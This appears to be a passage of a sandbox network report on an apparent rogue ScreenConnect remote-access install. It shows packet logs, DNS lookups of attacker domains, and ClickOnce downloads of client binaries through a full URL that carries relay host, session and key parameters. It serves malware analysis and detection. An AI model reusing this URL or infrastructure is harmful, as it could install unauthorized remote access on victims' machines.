                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.663765907 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.663779020 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.663804054 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.671108007 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.671180964 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.671196938 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.671205044 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.671241999 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.671252012 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.679003000 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.679048061 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.679080009 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.679086924 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.679117918 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.679138899 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.817388058 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.817446947 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.817467928 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.817476988 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.817507029 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.817526102 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.824151993 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.824199915 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.824224949 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.824233055 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.824270010 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.824285984 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.832118034 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.832161903 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.832186937 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.832194090 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.832221985 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.832246065 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.839857101 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.839900017 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.839925051 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.839931965 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.839960098 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.839975119 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.846774101 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.846818924 CET44349763104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:37.846844912 CET49763443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.683774948 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.683924913 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.683924913 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695699930 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695744991 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695780993 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695795059 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695828915 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695847988 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.706362009 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.706422091 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.706446886 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.706454992 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.706492901 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718708992 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718758106 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718786955 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718796968 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718821049 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718848944 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.730319023 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.730366945 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.730407000 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.730413914 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.730453014 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742358923 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742429018 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742456913 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742464066 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742621899 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742621899 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.754775047 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.754828930 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.754859924 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.754872084 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.755022049 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.755022049 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.867722988 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.867786884 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.867824078 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.867831945 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.867985964 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877157927 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877206087 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877238989 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877245903 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877265930 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877284050 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.886131048 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.886177063 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.886217117 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.886224985 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.886266947 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894042015 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894087076 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894120932 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894128084 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894150972 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894165039 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902677059 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902723074 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902746916 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902753115 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902776957 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902795076 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.911463976 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.911525011 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.911556959 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.911562920 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.911608934 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.919951916 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.920006037 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.920031071 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.920038939 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.920059919 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.920080900 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.928963900 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.929004908 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.929028034 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.929033995 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.929060936 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.929076910 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059209108 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059268951 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059286118 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059309006 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059325933 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059345007 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.066610098 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.066657066 CET44349764104.168.134.232192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2024 12:46:58.798923016 CET | 59310 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2024 12:46:59.415908098 CET | 53 | 59310 | 1.1.1.1 | 192.168.2.4
Dec 22, 2024 12:47:45.085733891 CET | 60991 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2024 12:47:45.469410896 CET | 53 | 60991 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 22, 2024 12:46:58.798923016 CET | 192.168.2.4 | 1.1.1.1 | 0x2233 | Standard query (0) | crea.alarmasdelsureste.com | A (IP address) | IN (0x0001) | false
Dec 22, 2024 12:47:45.085733891 CET | 192.168.2.4 | 1.1.1.1 | 0x6b27 | Standard query (0) | 0bd0.adrsxpjm0rga0n.de | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 22, 2024 12:46:59.415908098 CET | 1.1.1.1 | 192.168.2.4 | 0x2233 | No error (0) | crea.alarmasdelsureste.com |  | 104.168.134.232 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 12:47:02.825383902 CET | 1.1.1.1 | 192.168.2.4 | 0x4438 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 12:47:02.825383902 CET | 1.1.1.1 | 192.168.2.4 | 0x4438 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 12:47:04.224158049 CET | 1.1.1.1 | 192.168.2.4 | 0xf193 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 22, 2024 12:47:04.224158049 CET | 1.1.1.1 | 192.168.2.4 | 0xf193 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 12:47:05.890259981 CET | 1.1.1.1 | 192.168.2.4 | 0xe0ea | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 22, 2024 12:47:05.890259981 CET | 1.1.1.1 | 192.168.2.4 | 0xe0ea | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 12:47:45.469410896 CET | 1.1.1.1 | 192.168.2.4 | 0x6b27 | No error (0) | 0bd0.adrsxpjm0rga0n.de |  | 104.168.134.232 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                • crea.alarmasdelsureste.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.168.134.232 | 443 | 7604 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 11:47:01 UTC | 661 | OUT | GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session HTTP/1.1
Host: crea.alarmasdelsureste.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-12-22 11:47:02 UTC | 250 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 117905
Content-Type: application/x-ms-application; charset=utf-8
Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
Date: Sun, 22 Dec 2024 11:47:02 GMT
Connection: close
2024-12-22 11:47:02 UTC | 16134 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                                                                Data Ascii: HJeAs/s4YmrEYggJAG604qh9qzmE7idlS2AEHJhbcTZicQINYJ6LwbQdlx/8HkKPigXxdJbydxEwjVicQAPAsqXvaSdCQXg9hE6LxXCmeBlHdAJufh9jIxYn0AB2mURX+n5h5PMzFIxB8TKO+AS89Ta+RixOoAHMnjv32hEb4oPHndDrBWNQvI8yPgHH2IjFCTSARfn2o5bvJzw+TFhUwG4JvIOAacTiBBoA5tLq9zoqHOHxYcKiIeyqnUSKUcD
                                                                                                                                                                                                                                                2024-12-22 11:47:02 UTC3467INData Raw: 36 77 72 63 37 30 4a 36 61 42 49 30 41 41 49 34 31 30 44 4b 2b 43 36 6b 56 34 34 6e 67 41 41 6d 4e 59 30 6a 76 67 76 70 30 50 45 45 45 4d 41 6b 70 6e 47 4d 59 52 66 53 73 75 4d 4a 49 49 42 4a 58 49 48 48 73 41 76 70 32 50 45 45 45 4d 41 6b 72 73 42 6a 36 45 49 79 69 42 4a 41 41 4a 4d 61 53 42 6d 2f 43 38 6b 67 53 67 41 42 54 48 49 67 5a 66 77 75 4a 49 4d 6f 41 51 51 77 79 57 6b 63 4b 37 30 41 76 6d 38 51 4a 51 41 43 4f 4e 63 30 6a 6e 76 68 58 55 68 71 73 41 41 45 4d 4b 6b 72 38 47 70 38 46 35 49 61 4c 41 41 42 7a 48 55 37 74 33 51 68 72 61 6a 42 41 6b 41 41 35 78 70 49 75 64 67 4c 34 48 30 31 57 41 41 49 34 46 7a 54 4f 4a 62 43 56 7a 45 73 4f 35 77 41 41 70 6a 55 4e 49 37 34 56 51 78 32 45 51 49 49 59 4a 4a 58 34 50 6e 77 4c 69 53 37 43 41 45 45 4d 4b 6b
                                                                                                                                                                                                                                                Data Ascii: 6wrc70J6aBI0AAI410DK+C6kV44ngAAmNY0jvgvp0PEEEMAkpnGMYRfSsuMJIIBJXIHHsAvp2PEEEMAkrsBj6EIyiBJAAJMaSBm/C8kgSgABTHIgZfwuJIMoAQQwyWkcK70Avm8QJQACONc0jnvhXUhqsAAEMKkr8Gp8F5IaLAABzHU7t3QhrajBAkAA5xpIudgL4H01WAAI4FzTOJbCVzEsO5wAApjUNI74VQx2EQIIYJJX4PnwLiS7CAEEMKk


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.4  49737        104.168.134.232  443               7604  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-22 11:47:04 UTC  108                OUT        GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                       Host: crea.alarmasdelsureste.com
                                                       Accept-Encoding: gzip
2024-12-22 11:47:05 UTC  215                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 17866
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                       Date: Sun, 22 Dec 2024 11:47:04 GMT
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
2           192.168.2.4  49748        104.168.134.232  443               7604  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-22 11:47:13 UTC  134                OUT        GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                       Host: crea.alarmasdelsureste.com
                                                       Accept-Encoding: gzip
                                                       Connection: Keep-Alive
2024-12-22 11:47:14 UTC  215                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 95520
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                       Date: Sun, 22 Dec 2024 11:47:13 GMT
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
3           192.168.2.4  49750        104.168.134.232  443               7604  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-22 11:47:16 UTC  118                OUT        GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                       Host: crea.alarmasdelsureste.com
                                                       Accept-Encoding: gzip
2024-12-22 11:47:16 UTC  215                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 61216
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                       Date: Sun, 22 Dec 2024 11:47:16 GMT
                                                       Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49752 | 104.168.134.232 | 443 | 7604 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 11:47:18 UTC | 146 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
Host: crea.alarmasdelsureste.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-12-22 11:47:19 UTC | 213 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
Date: Sun, 22 Dec 2024 11:47:18 GMT
Connection: close
2024-12-22 11:47:19 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49753 | 104.168.134.232 | 443 | 7604 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 11:47:20 UTC | 117 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
Host: crea.alarmasdelsureste.com
Accept-Encoding: gzip
2024-12-22 11:47:20 UTC | 213 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
Date: Sun, 22 Dec 2024 11:47:20 GMT
Connection: close
2024-12-22 11:47:20 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49755 | 104.168.134.232 | 443 | 7604 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 11:47:22 UTC | 149 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
Host: crea.alarmasdelsureste.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-12-22 11:47:22 UTC | 213 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
Date: Sun, 22 Dec 2024 11:47:22 GMT
Connection: close
2024-12-22 11:47:22 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49756 | 104.168.134.232 | 443 | 7604 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 11:47:24 UTC | 115 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
Host: crea.alarmasdelsureste.com
Accept-Encoding: gzip
2024-12-22 11:47:24 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81696
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
Date: Sun, 22 Dec 2024 11:47:24 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49758 | 104.168.134.232 | 443 | 7604 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 11:47:26 UTC | 127 | OUT | GET /Bin/ScreenConnect.Client.dll HTTP/1.1
Host: crea.alarmasdelsureste.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-12-22 11:47:27 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197120
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
Date: Sun, 22 Dec 2024 11:47:26 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49760 | 104.168.134.232 | 443 | 7604 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 11:47:29 UTC | 134 | OUT | GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: crea.alarmasdelsureste.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-12-22 11:47:29 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68096
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
Date: Sun, 22 Dec 2024 11:47:29 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49762 | 104.168.134.232 | 443 | 7604 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 11:47:31 UTC | 128 | OUT | GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: crea.alarmasdelsureste.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-12-22 11:47:32 UTC | 217 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1721856
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
Date: Sun, 22 Dec 2024 11:47:31 GMT
Connection: close
